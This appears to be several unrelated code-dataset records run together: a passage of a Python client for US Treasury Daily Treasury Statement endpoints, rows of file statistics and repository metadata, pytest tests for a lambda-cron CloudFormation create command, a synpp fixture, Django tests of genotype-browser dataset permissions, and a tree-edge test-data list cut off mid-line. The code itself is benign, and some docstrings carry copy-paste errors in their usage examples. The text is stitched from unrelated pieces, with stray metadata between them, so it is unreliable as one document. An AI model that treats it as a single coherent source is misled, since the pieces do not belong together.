larger than a certain threshold. When no filters are provided,
the default response will return all fields and all data.
page_number : int (optional, Default=1)
The page number will set the index for the pagination, starting
at 1. This allows the user to paginate through the records
returned from an API request
page_size : int (optional, Default=100)
The page size will set the number of rows that are returned
on a request.
### Returns
----
Dict
A collection of `Records` resources.
### Usage
----
>>> treasury_client = FederalTreasuryClient()
>>> daily_treasury_service = treasury_client.daily_treasury_statement()
>>> daily_treasury_service.adjusted_public_debt_transactions()
"""
if fields:
fields = ','.join(fields)
if filters:
filters = ','.join(filters)
if sort:
sort = ','.join(sort)
content = self.treasury_session.make_request(
method='get',
endpoint='/v1/accounting/dts/dts_table_3b',
params={
'format': 'json',
'page[number]': page_number,
'page[size]': page_size,
'fields': fields,
'sort': sort,
'filters': filters
}
)
return content
def debt_subject_limit(
self,
fields: List[str] = None,
sort: List[str] = None,
filters: List[str] = None,
page_number: int = 1,
page_size: int = 100
) -> Dict:
"""Debt Subject to Limit.
### Overview
----
This table represents the breakdown of total public
debt outstanding as it relates to the statutory debt
limit. All figures are rounded to the nearest million.
### Parameters
----
fields : List[str] (optional, Default=None)
The fields parameter allows you to select which field(s) should be
included in the response. If desired fields are not specified, all
fields will be returned.
sort : List[str] (optional, Default=None)
The sort parameter allows a user to sort a field in ascending (least
to greatest) or descending (greatest to least) order. When no sort parameter
is specified, the default is to sort by the first column listed. Most API
endpoints are thus sorted by date in ascending order (historical to most
current).
filters : List[str] (optional, Default=None)
Filters are used to view a subset of the data based on specific
criteria. For example, you may want to find data that falls within
a certain date range, or only show records which contain a value
larger than a certain threshold. When no filters are provided,
the default response will return all fields and all data.
page_number : int (optional, Default=1)
The page number will set the index for the pagination, starting
at 1. This allows the user to paginate through the records
returned from an API request
page_size : int (optional, Default=100)
The page size will set the number of rows that are returned
on a request.
### Returns
----
Dict
A collection of `Records` resources.
### Usage
----
>>> treasury_client = FederalTreasuryClient()
>>> daily_treasury_service = treasury_client.daily_treasury_statement()
>>> daily_treasury_service.adjusted_public_debt_transactions()
"""
if fields:
fields = ','.join(fields)
if filters:
filters = ','.join(filters)
if sort:
sort = ','.join(sort)
content = self.treasury_session.make_request(
method='get',
endpoint='/v1/accounting/dts/dts_table_3c',
params={
'format': 'json',
'page[number]': page_number,
'page[size]': page_size,
'fields': fields,
'sort': sort,
'filters': filters
}
)
return content
def federal_tax_deposits(
self,
fields: List[str] = None,
sort: List[str] = None,
filters: List[str] = None,
page_number: int = 1,
page_size: int = 100
) -> Dict:
"""Federal Tax Deposits.
### Overview
----
This table represents the breakdown of taxes that are received
by the federal government. Federal taxes received are represented
as deposits in the Deposits and Withdrawals of Operating Cash
table. All figures are rounded to the nearest million.
### Parameters
----
fields : List[str] (optional, Default=None)
The fields parameter allows you to select which field(s) should be
included in the response. If desired fields are not specified, all
fields will be returned.
sort : List[str] (optional, Default=None)
The sort parameter allows a user to sort a field in ascending (least
to greatest) or descending (greatest to least) order. When no sort parameter
is specified, the default is to sort by the first column listed. Most API
endpoints are thus sorted by date in ascending order (historical to most
current).
filters : List[str] (optional, Default=None)
Filters are used to view a subset of the data based on specific
criteria. For example, you may want to find data that falls within
a certain date range, or only show records which contain a value
larger than a certain threshold. When no filters are provided,
the default response will return all fields and all data.
page_number : int (optional, Default=1)
The page number will set the index for the pagination, starting
at 1. This allows the user to paginate through the records
returned from an API request
page_size : int (optional, Default=100)
The page size will set the number of rows that are returned
on a request.
### Returns
----
Dict
A collection of `Records` resources.
### Usage
----
>>> treasury_client = FederalTreasuryClient()
>>> daily_treasury_service = treasury_client.daily_treasury_statement()
>>> daily_treasury_service.federal_tax_deposits()
"""
if fields:
fields = ','.join(fields)
if filters:
filters = ','.join(filters)
if sort:
sort = ','.join(sort)
content = self.treasury_session.make_request(
method='get',
endpoint='/v1/accounting/dts/dts_table_4',
params={
'format': 'json',
'page[number]': page_number,
'page[size]': page_size,
'fields': fields,
'sort': sort,
'filters': filters
}
)
return content
def short_term_cash_investments(
self,
fields: List[str] = None,
sort: List[str] = None,
filters: List[str] = None,
page_number: int = 1,
page_size: int = 100
) -> Dict:
"""Short Term Cash Investments.
### Overview
----
This table represents the amount Treasury has in short-term
cash investments. Deposits and withdrawals of short-term cash
investments are also represented in the Deposits and Withdrawals
of Operating Cash table. This program was suspended indefinitely
in 2008. All figures are rounded to the nearest million.
### Parameters
----
fields : List[str] (optional, Default=None)
The fields parameter allows you to select which field(s) should be
included in the response. If desired fields are not specified, all
fields will be returned.
sort : List[str] (optional, Default=None)
The sort parameter allows a user to sort a field in ascending (least
to greatest) or descending (greatest to least) order. When no sort parameter
is specified, the default is to sort by the first column listed. Most API
endpoints are thus sorted by date in ascending order (historical to most
current).
filters : List[str] (optional, Default=None)
Filters are used to view a subset of the data based on specific
criteria. For example, you may want to find data that falls within
a certain date range, or only show records which contain a value
larger than a certain threshold. When no filters are provided,
the default response will return all fields and all data.
page_number : int (optional, Default=1)
The page number will set the index for the pagination, starting
at 1. This allows the user to paginate through the records
returned from an API request
page_size : int (optional, Default=100)
The page size will set the number of rows that are returned
on a request.
### Returns
----
Dict
A collection of `Records` resources.
### Usage
----
>>> treasury_client = FederalTreasuryClient()
>>> daily_treasury_service = treasury_client.daily_treasury_statement()
>>> daily_treasury_service.short_term_cash_investments()
"""
if fields:
fields = ','.join(fields)
if filters:
filters = ','.join(filters)
if sort:
sort = ','.join(sort)
content = self.treasury_session.make_request(
method='get',
endpoint='/v1/accounting/dts/dts_table_5',
params={
'format': 'json',
'page[number]': page_number,
'page[size]': page_size,
'fields': fields,
'sort': sort,
'filters': filters
}
)
return content
def income_tax_refunds_issued(
self,
fields: List[str] = None,
sort: List[str] = None,
filters: List[str] = None,
page_number: int = 1,
page_size: int = 100
) -> Dict:
"""Income Tax Refunds Issued.
### Overview
----
This table represents the breakdown of tax refunds by recipient
(individual vs business) and type (check vs electronic funds
transfer). Tax refunds are also represented as withdrawals in the
Deposits and Withdrawals of Operating Cash table. All figures are
rounded to the nearest million.
### Parameters
----
fields : List[str] (optional, Default=None)
The fields parameter allows you to select which field(s) should be
included in the response. If desired fields are not specified, all
fields will be returned.
sort : List[str] (optional, Default=None)
The sort parameter allows a user to sort a field in ascending (least
to greatest) or descending (greatest to least) order. When no sort parameter
is specified, the default is to sort by the first column listed. Most API
endpoints are thus sorted by date in ascending order (historical to most
current).
filters : List[str] (optional, Default=None)
Filters are used to view a subset of the data based on specific
criteria. For example, you may want to find data that falls within
a certain date range, or only show records which contain a value
larger than a certain threshold. When no filters are provided,
the default response will return all fields and all data.
page_number : int (optional, Default=1)
The page number will set the index for the pagination, starting
at 1. This allows the user to paginate through the records
returned from an API request
page_size : int (optional, Default=100)
The page size will set the number of rows that are returned
on a request.
### Returns
----
Dict
A collection of `Records` resources.
### Usage
----
>>> treasury_client = FederalTreasuryClient()
>>> daily_treasury_service = treasury_client.daily_treasury_statement()
>>> daily_treasury_service.income_tax_refunds_issued()
"""
if fields:
fields = ','.join(fields)
if filters:
filters = ','.join(filters)
if sort:
sort = ','.join(sort)
content = self.treasury_session.make_request(
method='get',
endpoint='/v1/accounting/dts/dts_table_6',
params={
'format': 'json',
'page[number]': page_number,
'page[size]': page_size,
'fields': fields,
'sort': sort,
'filters': filters
}
)
return content
| 36.421941
| 108
| 0.581711
| 2,954
| 25,896
| 5.030467
| 0.079215
| 0.022611
| 0.017766
| 0.035532
| 0.865209
| 0.854441
| 0.851952
| 0.843674
| 0.843674
| 0.836541
| 0
| 0.005445
| 0.347544
| 25,896
| 710
| 109
| 36.473239
| 0.874053
| 0.615848
| 0
| 0.817778
| 0
| 0
| 0.106622
| 0.040544
| 0
| 0
| 0
| 0
| 0
| 1
| 0.044444
| false
| 0
| 0.013333
| 0
| 0.102222
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f6e6f99fa71eb56a8b9f37976822b41e75d44b49
| 8,066
|
py
|
Python
|
tests/cli/command/test_create.py
|
MediaMath/lambda-cron
|
2545e9fdeced7ebeaba2f98d02891cc6db7546e2
|
[
"Apache-2.0"
] | 22
|
2017-10-27T11:37:58.000Z
|
2021-11-09T09:35:37.000Z
|
tests/cli/command/test_create.py
|
MediaMath/lambda-cron
|
2545e9fdeced7ebeaba2f98d02891cc6db7546e2
|
[
"Apache-2.0"
] | 1
|
2018-03-21T18:31:01.000Z
|
2018-03-21T18:31:01.000Z
|
tests/cli/command/test_create.py
|
MediaMath/lambda-cron
|
2545e9fdeced7ebeaba2f98d02891cc6db7546e2
|
[
"Apache-2.0"
] | 3
|
2017-10-27T16:49:42.000Z
|
2018-11-03T04:14:10.000Z
|
# Copyright (C) 2016 MediaMath <http://www.mediamath.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
from tests.utils import valid_cong_file_path
from lambda_cron.cli.cli_config import CliConfigParser
from lambda_cron.cli.command.cloudformation import CreateCommand
from argparse import Namespace
@pytest.fixture(scope='module')
def config_parser():
return CliConfigParser(valid_cong_file_path())
class CreateCommandSpy(CreateCommand):
def __init__(self, *kwargs):
CreateCommand.__init__(self, *kwargs)
self.commands_list = []
self.lambda_function_config = {}
def _exec(self, command):
self.commands_list.append(command)
def write_lambda_functions_config(self, config):
self.lambda_function_config = config
CreateCommand.write_lambda_functions_config(self, config)
def test_create_command_with_bucket_exists_not_create_bucket(monkeypatch, config_parser):
cli_arguments = Namespace()
cli_arguments.command = 'create'
cli_arguments.environment = 'prod'
cli_arguments.aws_profile = None
cli_arguments.create_bucket = None
create_command = CreateCommandSpy(config_parser.get_config(cli_arguments.environment), cli_arguments)
def bucket_exists():
return True
monkeypatch.setattr(create_command, 'bucket_exists', bucket_exists)
create_command.run()
assert len(create_command.commands_list) == 4
assert 'pip' in create_command.commands_list[0]
assert '--profile' not in create_command.commands_list[0]
assert 's3' in create_command.commands_list[1] and 'cp' in create_command.commands_list[1]
assert 's3://test-bucket-custom' in create_command.commands_list[1][4]
assert '--profile' not in create_command.commands_list[1]
assert 'create-stack' in create_command.commands_list[2]
assert 'LambdaCron-prod' in create_command.commands_list[2]
assert '--template-body' in create_command.commands_list[2]
assert 'file://' in create_command.commands_list[2][6]
assert '/lambda-cron/lambda_cron/template.cfn.yml' in create_command.commands_list[2][6]
assert 'ParameterKey=Bucket,ParameterValue=test-bucket-custom' in create_command.commands_list[2]
assert 'ParameterKey=Environment,ParameterValue=prod' in create_command.commands_list[2]
assert 'ParameterKey=State,ParameterValue=ENABLED' in create_command.commands_list[2]
assert 'ParameterKey=CronExpression,ParameterValue=cron(*/5 * * * ? *)' in create_command.commands_list[2]
assert 'ParameterKey=AlarmEnabled,ParameterValue=True' in create_command.commands_list[2]
assert 'ParameterKey=AlarmEmail,ParameterValue=my@email.com' in create_command.commands_list[2]
assert 'ParameterKey=AlarmPeriod,ParameterValue=300' in create_command.commands_list[2]
assert '--profile' not in create_command.commands_list[2]
assert 'stack-create-complete' in create_command.commands_list[3]
assert '--profile' not in create_command.commands_list[3]
def test_create_command_with_bucket_not_exists_not_create_bucket(monkeypatch, config_parser):
cli_arguments = Namespace()
cli_arguments.command = 'create'
cli_arguments.environment = 'prod'
cli_arguments.aws_profile = None
cli_arguments.create_bucket = None
create_command = CreateCommandSpy(config_parser.get_config(cli_arguments.environment), cli_arguments)
def bucket_exists():
return False
monkeypatch.setattr(create_command, 'bucket_exists', bucket_exists)
with pytest.raises(RuntimeError) as ex_info:
create_command.run()
assert "Bucket 'test-bucket-custom' does not exist" in str(ex_info)
def test_create_command_with_bucket_exists_create_bucket(monkeypatch, config_parser):
cli_arguments = Namespace()
cli_arguments.command = 'create'
cli_arguments.environment = 'prod'
cli_arguments.aws_profile = None
cli_arguments.create_bucket = True
create_command = CreateCommandSpy(config_parser.get_config(cli_arguments.environment), cli_arguments)
def bucket_exists():
return True
monkeypatch.setattr(create_command, 'bucket_exists', bucket_exists)
with pytest.raises(RuntimeError) as ex_info:
create_command.run()
assert "Bucket 'test-bucket-custom' already exists" in str(ex_info)
def test_create_command_with_bucket_not_exists_create_bucket(monkeypatch, config_parser):
cli_arguments = Namespace()
cli_arguments.command = 'create'
cli_arguments.environment = 'prod'
cli_arguments.aws_profile = None
cli_arguments.create_bucket = True
create_command = CreateCommandSpy(config_parser.get_config(cli_arguments.environment), cli_arguments)
def bucket_exists():
return False
monkeypatch.setattr(create_command, 'bucket_exists', bucket_exists)
create_command.run()
assert len(create_command.commands_list) == 5
assert set(['aws', 's3', 'mb']).issubset(create_command.commands_list[0])
assert 'pip' in create_command.commands_list[1]
assert '--profile' not in create_command.commands_list[1]
assert 's3' in create_command.commands_list[2] and 'cp' in create_command.commands_list[2]
assert 's3://test-bucket-custom' in create_command.commands_list[2][4]
assert '--profile' not in create_command.commands_list[2]
assert 'create-stack' in create_command.commands_list[3]
assert 'LambdaCron-prod' in create_command.commands_list[3]
assert '--template-body' in create_command.commands_list[3]
assert 'file://' in create_command.commands_list[3][6]
assert '/lambda-cron/lambda_cron/template.cfn.yml' in create_command.commands_list[3][6]
assert 'ParameterKey=Bucket,ParameterValue=test-bucket-custom' in create_command.commands_list[3]
assert 'ParameterKey=Environment,ParameterValue=prod' in create_command.commands_list[3]
assert 'ParameterKey=State,ParameterValue=ENABLED' in create_command.commands_list[3]
assert 'ParameterKey=CronExpression,ParameterValue=cron(*/5 * * * ? *)' in create_command.commands_list[3]
assert 'ParameterKey=AlarmEnabled,ParameterValue=True' in create_command.commands_list[3]
assert 'ParameterKey=AlarmEmail,ParameterValue=my@email.com' in create_command.commands_list[3]
assert 'ParameterKey=AlarmPeriod,ParameterValue=300' in create_command.commands_list[3]
assert '--profile' not in create_command.commands_list[3]
assert 'stack-create-complete' in create_command.commands_list[4]
assert '--profile' not in create_command.commands_list[4]
def test_create_command_with_profile(monkeypatch, config_parser):
cli_arguments = Namespace()
cli_arguments.command = 'create'
cli_arguments.environment = 'prod'
cli_arguments.aws_profile = 'test-profile'
cli_arguments.create_bucket = True
create_command = CreateCommandSpy(config_parser.get_config(cli_arguments.environment), cli_arguments)
def bucket_exists():
return False
monkeypatch.setattr(create_command, 'bucket_exists', bucket_exists)
create_command.run()
assert '--profile' in create_command.commands_list[0]
assert 'test-profile' in create_command.commands_list[0]
assert '--profile' not in create_command.commands_list[1]
assert '--profile' in create_command.commands_list[2]
assert 'test-profile' in create_command.commands_list[2]
assert '--profile' in create_command.commands_list[3]
assert 'test-profile' in create_command.commands_list[3]
assert '--profile' in create_command.commands_list[4]
assert 'test-profile' in create_command.commands_list[4]
| 45.829545
| 110
| 0.768411
| 1,059
| 8,066
| 5.596789
| 0.147309
| 0.162308
| 0.191328
| 0.227771
| 0.832293
| 0.828244
| 0.810866
| 0.776784
| 0.658512
| 0.638434
| 0
| 0.01163
| 0.136499
| 8,066
| 175
| 111
| 46.091429
| 0.83934
| 0.071039
| 0
| 0.449612
| 0
| 0
| 0.180372
| 0.110443
| 0
| 0
| 0
| 0
| 0.418605
| 1
| 0.108527
| false
| 0
| 0.03876
| 0.046512
| 0.20155
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
f6f412bff8273727f5753e46ab5d946f34ea9833
| 263
|
py
|
Python
|
tests/fixtures/downstream/chain_d.py
|
Nitnelav/synpp
|
b2b2136a99701ce77fd4fea939f8efb521f67c21
|
[
"MIT"
] | 6
|
2020-04-01T12:06:20.000Z
|
2021-11-02T19:10:27.000Z
|
tests/fixtures/downstream/chain_d.py
|
Nitnelav/synpp
|
b2b2136a99701ce77fd4fea939f8efb521f67c21
|
[
"MIT"
] | 26
|
2019-12-08T12:25:39.000Z
|
2022-02-28T07:24:56.000Z
|
tests/fixtures/downstream/chain_d.py
|
Nitnelav/synpp
|
b2b2136a99701ce77fd4fea939f8efb521f67c21
|
[
"MIT"
] | 8
|
2020-06-19T15:49:46.000Z
|
2021-07-06T10:15:37.000Z
|
def configure(context):
context.stage("tests.fixtures.downstream.chain_c", { "a": 5 }, alias = "s1")
context.stage("tests.fixtures.downstream.chain_c", { "a": 10 }, alias = "s2")
def execute(context):
return context.stage("s1") + context.stage("s2")
| 37.571429
| 81
| 0.657795
| 35
| 263
| 4.885714
| 0.485714
| 0.280702
| 0.19883
| 0.292398
| 0.491228
| 0.491228
| 0.491228
| 0.491228
| 0
| 0
| 0
| 0.030973
| 0.140684
| 263
| 6
| 82
| 43.833333
| 0.725664
| 0
| 0
| 0
| 0
| 0
| 0.288973
| 0.250951
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0
| 0
| 0.2
| 0.6
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
d60f1f4f78c3eb4e352de1e7502a0aaddc3a0d2b
| 8,735
|
py
|
Python
|
wdae/wdae/genotype_browser/tests/test_query_api.py
|
iossifovlab/gpf
|
e556243d29666179dbcb72859845b4d6c011af2b
|
[
"MIT"
] | null | null | null |
wdae/wdae/genotype_browser/tests/test_query_api.py
|
iossifovlab/gpf
|
e556243d29666179dbcb72859845b4d6c011af2b
|
[
"MIT"
] | 82
|
2019-07-22T11:44:23.000Z
|
2022-01-13T15:27:33.000Z
|
wdae/wdae/genotype_browser/tests/test_query_api.py
|
iossifovlab/gpf
|
e556243d29666179dbcb72859845b4d6c011af2b
|
[
"MIT"
] | null | null | null |
import copy
import json
import pytest
from datasets_api.permissions import add_group_perm_to_user, \
add_group_perm_to_dataset
from rest_framework import status
pytestmark = pytest.mark.usefixtures(
"wdae_gpf_instance", "dae_calc_gene_sets")
EXAMPLE_REQUEST_F1 = {
"datasetId": "quads_f1",
}
QUERY_VARIANTS_URL = "/api/v3/genotype_browser/query"
def test_simple_query(db, admin_client, preview_sources):
data = copy.deepcopy(EXAMPLE_REQUEST_F1)
data['sources'] = list(preview_sources)
response = admin_client.post(
QUERY_VARIANTS_URL, json.dumps(data), content_type="application/json"
)
assert status.HTTP_200_OK == response.status_code
res = response.streaming_content
res = json.loads("".join(map(lambda x: x.decode("utf-8"), res)))
assert len(res) == 3
def test_simple_query_download(db, admin_client, download_sources):
data = {
"queryData": json.dumps({
**EXAMPLE_REQUEST_F1,
"download": True,
"sources": download_sources
})
}
response = admin_client.post(
QUERY_VARIANTS_URL, json.dumps(data), content_type="application/json"
)
assert response.status_code == status.HTTP_200_OK
res = list(response.streaming_content)
assert res
assert res[0]
header = res[0].decode("utf-8")[:-1].split("\t")
assert len(res) == 4
assert set(header) == {
"family id",
"studyName",
"phenotype",
"location",
"variant",
"bestSt",
"fromParentS",
"inChS",
"worstEffect",
"genes",
"counts",
"geneEffect",
"effectDetails",
"LGD_rank",
"RVIS_rank",
"pLI_rank",
"SSC-freq",
"EVS-freq",
"E65-freq",
"instrument1.categorical",
"instrument1.continuous",
"instrument1.ordinal",
"instrument1.raw",
}
def test_simple_query_summary_variants(
db, admin_client, summary_preview_sources
):
data = copy.deepcopy(EXAMPLE_REQUEST_F1)
data['sources'] = list(summary_preview_sources)
response = admin_client.post(
QUERY_VARIANTS_URL,
json.dumps(data),
content_type="application/json"
)
assert status.HTTP_200_OK == response.status_code
res = response.streaming_content
res = json.loads("".join(map(lambda x: x.decode("utf-8"), res)))
assert len(res) == 3
def test_simple_query_summary_variants_download(
db, admin_client, summary_download_sources
):
data = {
"queryData": json.dumps({
**EXAMPLE_REQUEST_F1,
"download": True,
"sources": summary_download_sources
})
}
response = admin_client.post(
QUERY_VARIANTS_URL, json.dumps(data), content_type="application/json"
)
assert response.status_code == status.HTTP_200_OK
res = list(response.streaming_content)
assert res
assert res[0]
header = res[0].decode("utf-8")[:-1].split("\t")
assert len(res) == 4
assert set(header) == {
"location",
"variant",
"worstEffect",
"genes",
"geneEffect",
"effectDetails",
"LGD_rank",
"RVIS_rank",
"pLI_rank",
"SSC-freq",
"EVS-freq",
"E65-freq",
"instrument1.categorical",
"instrument1.continuous",
"instrument1.ordinal",
"instrument1.raw",
}
@pytest.mark.parametrize("url", [QUERY_VARIANTS_URL])
def test_missing_dataset(db, user_client, url, preview_sources):
data = copy.deepcopy(EXAMPLE_REQUEST_F1)
data['sources'] = list(preview_sources)
del data["datasetId"]
response = user_client.post(
url, json.dumps(data), content_type="application/json"
)
assert status.HTTP_400_BAD_REQUEST, response.status_code
@pytest.mark.parametrize("url", [QUERY_VARIANTS_URL])
def test_bad_dataset(db, user_client, url, preview_sources):
data = copy.deepcopy(EXAMPLE_REQUEST_F1)
data['sources'] = list(preview_sources)
data["datasetId"] = "ala bala portokala"
response = user_client.post(
url, json.dumps(data), content_type="application/json"
)
assert status.HTTP_400_BAD_REQUEST, response.status_code
# START: Adaptive datasets rights
def test_normal_dataset_rights_query(db, user, user_client, preview_sources):
data = {
"datasetId": "composite_dataset_ds",
"sources": list(preview_sources),
}
add_group_perm_to_user("composite_dataset_ds", user)
response = user_client.post(
QUERY_VARIANTS_URL, json.dumps(data), content_type="application/json"
)
assert status.HTTP_200_OK == response.status_code
res = response.streaming_content
res = json.loads("".join(map(lambda x: x.decode("utf-8"), res)))
assert len(res) == 17
def test_mixed_dataset_rights_query(db, user, user_client, preview_sources):
data = {
"datasetId": "composite_dataset_ds",
"sources": list(preview_sources),
}
add_group_perm_to_user("inheritance_trio", user)
response = user_client.post(
QUERY_VARIANTS_URL, json.dumps(data), content_type="application/json"
)
assert status.HTTP_200_OK == response.status_code
res = response.streaming_content
res = json.loads("".join(map(lambda x: x.decode("utf-8"), res)))
assert len(res) == 14
def test_mixed_layered_dataset_rights_query(
db, user, user_client, preview_sources
):
data = {
"datasetId": "composite_dataset_ds",
"sources": list(preview_sources),
}
add_group_perm_to_user("inheritance_trio", user)
add_group_perm_to_user("composite_dataset_ds", user)
response = user_client.post(
QUERY_VARIANTS_URL, json.dumps(data), content_type="application/json"
)
assert status.HTTP_200_OK == response.status_code
res = response.streaming_content
res = json.loads("".join(map(lambda x: x.decode("utf-8"), res)))
assert len(res) == 17
def test_mixed_layered_diff_group_dataset_rights_query(
db, user, user_client, preview_sources
):
data = {
"datasetId": "composite_dataset_ds",
"sources": list(preview_sources),
}
add_group_perm_to_dataset("new_custom_group", "composite_dataset_ds")
add_group_perm_to_dataset("new_custom_group", "inheritance_trio")
add_group_perm_to_user("new_custom_group", user)
response = user_client.post(
QUERY_VARIANTS_URL, json.dumps(data), content_type="application/json"
)
assert status.HTTP_200_OK == response.status_code
res = response.streaming_content
res = json.loads("".join(map(lambda x: x.decode("utf-8"), res)))
assert len(res) == 17
def test_mixed_dataset_rights_download(
db, user, user_client, download_sources
):
data = {
"queryData": json.dumps({
"datasetId": "composite_dataset_ds",
"sources": list(download_sources),
"download": True,
})
}
add_group_perm_to_dataset("new_custom_group", "inheritance_trio")
add_group_perm_to_user("new_custom_group", user)
response = user_client.post(
QUERY_VARIANTS_URL, json.dumps(data), content_type="application/json"
)
assert response.status_code == status.HTTP_200_OK
res = list(response.streaming_content)
assert len(res) == 15
def test_mixed_dataset_rights_third_party_group(
db, user, user_client, preview_sources
):
data = {
"datasetId": "composite_dataset_ds",
"sources": list(preview_sources),
}
add_group_perm_to_dataset("new_custom_group", "inheritance_trio")
add_group_perm_to_user("new_custom_group", user)
response = user_client.post(
QUERY_VARIANTS_URL, json.dumps(data), content_type="application/json"
)
assert status.HTTP_200_OK == response.status_code
res = response.streaming_content
res = json.loads("".join(map(lambda x: x.decode("utf-8"), res)))
assert len(res) == 14
def test_mixed_dataset_rights_with_study_filters(
db, user, user_client, preview_sources
):
data = {
"datasetId": "composite_dataset_ds",
"studyFilters": [{"studyId": "quads_f1"}],
"sources": list(preview_sources),
}
add_group_perm_to_dataset("new_custom_group", "inheritance_trio")
add_group_perm_to_user("new_custom_group", user)
response = user_client.post(
QUERY_VARIANTS_URL, json.dumps(data), content_type="application/json"
)
assert status.HTTP_200_OK == response.status_code
res = response.streaming_content
res = json.loads("".join(map(lambda x: x.decode("utf-8"), res)))
print(res)
assert len(res) == 0
# END: Adaptive datasets rights
| 27.730159
| 77
| 0.663652
| 1,067
| 8,735
| 5.117151
| 0.134021
| 0.051282
| 0.032967
| 0.038462
| 0.863919
| 0.849817
| 0.834066
| 0.825092
| 0.825092
| 0.807875
| 0
| 0.013711
| 0.215112
| 8,735
| 314
| 78
| 27.818471
| 0.782672
| 0.006983
| 0
| 0.70082
| 0
| 0
| 0.170338
| 0.013839
| 0
| 0
| 0
| 0
| 0.122951
| 1
| 0.053279
| false
| 0
| 0.020492
| 0
| 0.07377
| 0.004098
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d6173c9d2e431150263aeeed5ef3087de9d5310a
| 145,641
|
py
|
Python
|
p310_minimum_height_trees_data.py
|
feigaochn/leetcode
|
abf0877fae02aa9c2549051f0b68df0ace952512
|
[
"MIT"
] | null | null | null |
p310_minimum_height_trees_data.py
|
feigaochn/leetcode
|
abf0877fae02aa9c2549051f0b68df0ace952512
|
[
"MIT"
] | null | null | null |
p310_minimum_height_trees_data.py
|
feigaochn/leetcode
|
abf0877fae02aa9c2549051f0b68df0ace952512
|
[
"MIT"
] | null | null | null |
data = [
(5000,
[[0,1],[1,2],[2,3],[3,4],[4,5],[5,6],[6,7],[7,8],[8,9],[9,10],[10,11],[11,12],[12,13],[13,14],[14,15],[15,16],[16,17],[17,18],[18,19],[19,20],[20,21],[21,22],[22,23],[23,24],[24,25],[25,26],[26,27],[27,28],[28,29],[29,30],[30,31],[31,32],[32,33],[33,34],[34,35],[35,36],[36,37],[37,38],[38,39],[39,40],[40,41],[41,42],[42,43],[43,44],[44,45],[45,46],[46,47],[47,48],[48,49],[49,50],[50,51],[51,52],[52,53],[53,54],[54,55],[55,56],[56,57],[57,58],[58,59],[59,60],[60,61],[61,62],[62,63],[63,64],[64,65],[65,66],[66,67],[67,68],[68,69],[69,70],[70,71],[71,72],[72,73],[73,74],[74,75],[75,76],[76,77],[77,78],[78,79],[79,80],[80,81],[81,82],[82,83],[83,84],[84,85],[85,86],[86,87],[87,88],[88,89],[89,90],[90,91],[91,92],[92,93],[93,94],[94,95],[95,96],[96,97],[97,98],[98,99],[99,100],[100,101],[101,102],[102,103],[103,104],[104,105],[105,106],[106,107],[107,108],[108,109],[109,110],[110,111],[111,112],[112,113],[113,114],[114,115],[115,116],[116,117],[117,118],[118,119],[119,120],[120,121],[121,122],[122,123],[123,124],[124,125],[125,126],[126,127],[127,128],[128,129],[129,130],[130,131],[131,132],[132,133],[133,134],[134,135],[135,136],[136,137],[137,138],[138,139],[139,140],[140,141],[141,142],[142,143],[143,144],[144,145],[145,146],[146,147],[147,148],[148,149],[149,150],[150,151],[151,152],[152,153],[153,154],[154,155],[155,156],[156,157],[157,158],[158,159],[159,160],[160,161],[161,162],[162,163],[163,164],[164,165],[165,166],[166,167],[167,168],[168,169],[169,170],[170,171],[171,172],[172,173],[173,174],[174,175],[175,176],[176,177],[177,178],[178,179],[179,180],[180,181],[181,182],[182,183],[183,184],[184,185],[185,186],[186,187],[187,188],[188,189],[189,190],[190,191],[191,192],[192,193],[193,194],[194,195],[195,196],[196,197],[197,198],[198,199],[199,200],[200,201],[201,202],[202,203],[203,204],[204,205],[205,206],[206,207],[207,208],[208,209],[209,210],[210,211],[211,212],[212,213],[213,214],[214,215],[215,216],[216,217],[217,218],[218,219],[219,220],[220,221],[221,222],[222,223],[223,224],[224,225],[225,226],[226,227],[227,228],[228,229],[229,230],[230,231],[231,232],[232,233],[233,234],[234,235],[235,236],[236,237],[237,238],[238,239],[239,240],[240,241],[241,242],[242,243],[243,244],[244,245],[245,246],[246,247],[247,248],[248,249],[249,250],[250,251],[251,252],[252,253],[253,254],[254,255],[255,256],[256,257],[257,258],[258,259],[259,260],[260,261],[261,262],[262,263],[263,264],[264,265],[265,266],[266,267],[267,268],[268,269],[269,270],[270,271],[271,272],[272,273],[273,274],[274,275],[275,276],[276,277],[277,278],[278,279],[279,280],[280,281],[281,282],[282,283],[283,284],[284,285],[285,286],[286,287],[287,288],[288,289],[289,290],[290,291],[291,292],[292,293],[293,294],[294,295],[295,296],[296,297],[297,298],[298,299],[299,300],[300,301],[301,302],[302,303],[303,304],[304,305],[305,306],[306,307],[307,308],[308,309],[309,310],[310,311],[311,312],[312,313],[313,314],[314,315],[315,316],[316,317],[317,318],[318,319],[319,320],[320,321],[321,322],[322,323],[323,324],[324,325],[325,326],[326,327],[327,328],[328,329],[329,330],[330,331],[331,332],[332,333],[333,334],[334,335],[335,3